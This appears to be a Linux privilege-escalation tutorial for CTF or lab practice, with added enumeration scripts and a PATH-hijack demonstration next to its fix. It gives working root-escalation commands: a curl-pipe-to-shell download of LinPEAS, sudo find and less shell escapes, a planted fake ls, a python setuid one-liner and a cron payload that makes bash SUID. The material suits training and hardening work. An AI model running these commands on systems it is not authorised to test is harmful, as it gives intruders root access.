Privilege escalation means abusing misconfigurations or vulnerabilities to move from a low-privileged account (www-data, a normal user) to root. It is a critical phase of any real-world intrusion or CTF challenge, and almost always starts with enumeration: what can this user run, read, write or trigger that root will act on?
# Download and run LinPEAS directly on the target (the target needs outbound HTTPS for this):
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
# No internet on the target? Host linpeas.sh on the attacker box (python3 -m http.server) and curl it from there.
Administrators often allow users to run specific commands as root without a password (NOPASSWD rules in sudoers). If one of those commands can launch another program (an -exec option, a ! shell escape, an editor, a pager), we use it to spawn a root shell.
# Check allowed sudo commands (rules apply to this user; NOPASSWD ones need no password):
sudo -l
# (ALL) NOPASSWD: /usr/bin/find  ->  -exec runs our command for the first match, -quit stops find afterwards:
sudo find / -exec /bin/bash \; -quit
# (ALL) NOPASSWD: /usr/bin/less  ->  less runs shell commands from its prompt:
sudo less /etc/passwd
# inside less, type: !bash
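Added example, not part of the original page: a small parser for `sudo -l` output that pulls out the NOPASSWD rules and the bare binary names to look up on GTFOBins. The sample output, the user name www-data and the host name target are constructed; on a real box the functions read `sudo -l` directly. Note the secure_path entry in the Defaults line of the sample: when it is set, sudo replaces PATH for the command it runs, so a PATH hijack (see the SUID section) does not apply to sudo'ed commands and only the rule's own shell escapes matter.

```shell
#!/bin/bash
# Added example (not from the original page): parse `sudo -l` output into the
# commands we can run as root without a password. The sample text below is
# constructed; on a target run:  sudo -l 2>/dev/null | sudo_nopasswd

# Constructed sample of `sudo -l` for user www-data (host name and rules are made up).
SAMPLE_SUDO_L='Matching Defaults entries for www-data on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on target:
    (ALL) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/less, /usr/bin/vim /var/log/*
    (ALL : ALL) /usr/bin/systemctl restart apache2'

# All rules, one per line, with the "(runas)" prefix removed. Each output line
# is then "[NOPASSWD:] /path/to/cmd [args][, /path/to/cmd2 ...]".
sudo_rules() {
  # keep the block from the "may run the following commands" header to the end,
  # drop the header itself, then strip "(ALL)", "(root)", "(ALL : ALL)" etc.
  sed -n '/may run the following commands/,$p' |
    sed '1d' |
    sed 's/^[[:space:]]*([^)]*)[[:space:]]*//'
}

# Only the rules that need no password, split on commas, one command per line.
sudo_nopasswd() {
  sudo_rules |
    grep '^NOPASSWD:' |
    sed 's/^NOPASSWD:[[:space:]]*//' |
    tr ',' '\n' |
    sed 's/^[[:space:]]*//'
}

# Bare binary names from the NOPASSWD rules, i.e. what to search for on GTFOBins.
sudo_nopasswd_bins() {
  sudo_nopasswd | awk '{ n = split($1, p, "/"); print p[n] }'
}

printf '%s\n' "$SAMPLE_SUDO_L" | sudo_nopasswd_bins   # prints find, less, vim (one per line)
```

Rules without NOPASSWD are still worth noting (sudo_rules lists them too): they become usable the moment the user's password turns up in a config file or history.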
I've prepared a web terminal simulating initial access to a Linux machine as user www-data. Enumerate your permissions and exploit them to get root privileges.
SUID binaries run with the effective UID of their owner (usually root) no matter who launches them, so any way of making such a binary execute our input or our commands runs as root. Check GTFOBins for known shell escapes of the ones you find.
# Find SUID binaries (2>/dev/null hides the permission-denied noise from unreadable directories):
find / -perm -4000 -type f 2>/dev/null
If a SUID binary executes another program by bare name (e.g. ls instead of /bin/ls) through system() or execvp(), the lookup walks our PATH variable. Putting a directory we control first in PATH makes the binary run our own malicious ls as root.
printf '#!/bin/sh\n/bin/bash -p\n' > /tmp/ls   # -p keeps the effective UID (root) instead of dropping it
chmod +x /tmp/ls
export PATH=/tmp:$PATH                         # our directory is searched first
./vulnerable_suid_binary                       # its internal "ls" now runs /tmp/ls as root
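Added example, not from the original page: an unprivileged, runnable demonstration of the hijack next to the fix. vuln_prog and fixed_prog are hypothetical stand-ins for the SUID binary: the first runs ls by bare name through the shell, which is what a C program calling system("ls") does; the second uses an absolute path and resets PATH before executing anything. Nothing here is SUID, so the planted ls prints a marker instead of spawning a shell; on a real target the same lookup happens inside a root process, which is why the planted script there is /bin/bash -p.

```shell
#!/bin/bash
# Added example (not from the original page). vuln_prog and fixed_prog are
# hypothetical stand-ins for the SUID binary; nothing here needs root.
set -u

HIJACK_DIR=$(mktemp -d)

# Vulnerable stand-in: runs "ls" by bare name through the shell, exactly what
# system("ls") in a C program does. Resolution uses whatever PATH we hand it.
vuln_prog() {
  sh -c 'ls /'
}

# Hardened stand-in: absolute path, and PATH reset to known-good directories
# before anything is executed, so the caller's environment cannot steer it.
fixed_prog() {
  env PATH=/usr/bin:/bin sh -c '/bin/ls /'
}

# Plant a fake "ls" in a directory we control. The shebang lets execve() run it
# directly; on a target the body would be "/bin/bash -p" to keep the root EUID.
plant_fake_ls() {
  printf '#!/bin/sh\necho HIJACKED\n' > "$HIJACK_DIR/ls"
  chmod +x "$HIJACK_DIR/ls"
}

# Run a program with our directory first in PATH; return its first output line.
# The subshell keeps the modified PATH from leaking into the caller.
run_with_hijacked_path() {
  ( export PATH="$HIJACK_DIR:$PATH"; "$@" ) | head -n 1
}

plant_fake_ls
echo "vulnerable stand-in: $(run_with_hijacked_path vuln_prog)"   # HIJACKED
echo "hardened stand-in:   $(run_with_hijacked_path fixed_prog)"  # a real entry of /, e.g. bin
```

To find out which bare names a real SUID binary resolves, run `strings` on it and look for command names without a leading slash, or trace it with `ltrace` and watch the system()/execvp() calls; the hijack only works when the binary neither hard-codes absolute paths nor sanitises PATH before executing.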
File capabilities are a finer-grained alternative to SUID: instead of full root, a binary is granted individual privileges (raw sockets, reading any file, changing UID). Some of them, such as cap_setuid or cap_dac_read_search, are as good as root on their own, so a capable python, perl or tar is a direct escalation path.
# List binaries with file capabilities (-r recurses; errors from unreadable paths are discarded):
getcap -r / 2>/dev/null
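Added example, not from the original page: a filter over getcap -r / output that flags the capabilities which amount to root by themselves. It accepts both output formats getcap has used (newer libcap prints "/path cap_x=ep", older versions print "/path = cap_x+ep"). The sample lines are constructed, and the shortlist of dangerous capabilities is my own starting point rather than anything from the page.

```shell
#!/bin/bash
# Added example (not part of the original page): flag binaries whose file
# capabilities are enough to become root. Sample input is constructed.

# Capabilities that on their own give a path to root: set UID/GID to 0, bypass
# file permission checks, mount/ptrace/load modules, change file owners or caps.
DANGEROUS_CAPS='cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown cap_fowner cap_setfcap'

# Constructed sample mixing both getcap output formats.
SAMPLE_GETCAP='/usr/bin/ping cap_net_raw=ep
/usr/bin/python3.8 cap_setuid=ep
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
/usr/bin/tar = cap_dac_read_search+ep
/usr/bin/perl cap_setuid,cap_sys_admin=ep'

# Read getcap lines on stdin; print "path capability" for every dangerous one.
dangerous_caps() {
  awk -v list="$DANGEROUS_CAPS" '
    BEGIN { n = split(list, arr, " "); for (i = 1; i <= n; i++) danger[arr[i]] = 1 }
    NF == 0 { next }
    {
      path = $1
      caps = $0
      sub(/^[^ ]+ +(= +)?/, "", caps)   # strip "/path " (new format) or "/path = " (old format)
      sub(/[=+][a-z]*$/, "", caps)      # strip the "=ep" / "+eip" flag suffix
      m = split(caps, c, ",")
      for (i = 1; i <= m; i++) if (c[i] in danger) print path, c[i]
    }'
}

# On a target:  getcap -r / 2>/dev/null | dangerous_caps
# e.g. cap_setuid on python3 is then exploited with:
#   python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
printf '%s\n' "$SAMPLE_GETCAP" | dangerous_caps
```

cap_net_raw and cap_net_admin (ping, tcpdump) are left out on purpose: they allow sniffing and raw sockets, useful for lateral movement, but not a local root shell by themselves.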
# System crons (also check /etc/cron.d/, /etc/cron.{hourly,daily,weekly,monthly}/ and /var/spool/cron/crontabs/):
cat /etc/crontab
ls -la /etc/cron.d /etc/cron.*
# If a script that root's cron runs is writable by our user, append a payload and wait for the next run:
echo 'chmod +s /bin/bash' >> /path/to/script.sh
# Once the job has fired, /bin/bash is SUID root; -p keeps the elevated effective UID:
/bin/bash -p
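Added example, not from the original page: a check that lists the absolute paths executed by system-crontab entries and reports the ones the current user can write to. The crontab file and the scripts it references are constructed in a temporary directory so the example runs anywhere; on a target, point the functions at /etc/crontab, the files in /etc/cron.d/ and, if readable, /var/spool/cron/crontabs/.

```shell
#!/bin/bash
# Added example (not part of the original page): find cron-executed scripts the
# current user can modify. The crontab and scripts below are constructed.

SAMPLE_DIR=$(mktemp -d)
printf '#!/bin/sh\ntar czf /var/backups/www.tgz /var/www\n' > "$SAMPLE_DIR/backup.sh"
chmod 755 "$SAMPLE_DIR/backup.sh"   # on a real box this would be root-owned; here it is ours, hence writable
cat > "$SAMPLE_DIR/crontab" <<EOF
# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    run-parts --report /etc/cron.hourly
*/5 *   * * *   root    $SAMPLE_DIR/backup.sh
@reboot         root    /bin/sh $SAMPLE_DIR/missing-cleanup.sh
EOF

# Absolute paths from the command field of a system crontab. Lines are either
# "min hour dom mon dow user command..." or "@reboot user command...";
# comments, blank lines and VAR=value lines are skipped. Every token starting
# with "/" is printed, so "/bin/sh /opt/x.sh" yields the interpreter and the script.
cron_paths() {
  grep -vE '^[[:space:]]*(#|$)' "$1" |
    grep -vE '^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=' |
    awk '{ start = ($1 ~ /^@/) ? 3 : 7; for (i = start; i <= NF; i++) if ($i ~ /^\//) print $i }'
}

# Of those paths, the regular files we can modify. A writable directory on the
# path would also do (replace the script), but is left out to keep the check exact.
writable_cron_scripts() {
  cron_paths "$1" | while read -r path; do
    if [ -f "$path" ] && [ -w "$path" ]; then
      echo "$path"
    fi
  done
}

writable_cron_scripts "$SAMPLE_DIR/crontab"   # as an unprivileged user: $SAMPLE_DIR/backup.sh
```

Two things the check does not cover but that are worth eyeballing in the same files: a command given without a path ("backup.sh" instead of "/opt/backup.sh") is resolved through the PATH= line of the crontab, so a writable directory early in that PATH is as good as a writable script, and a user crontab (crontab -l) has no user field, so the awk offsets shift by one.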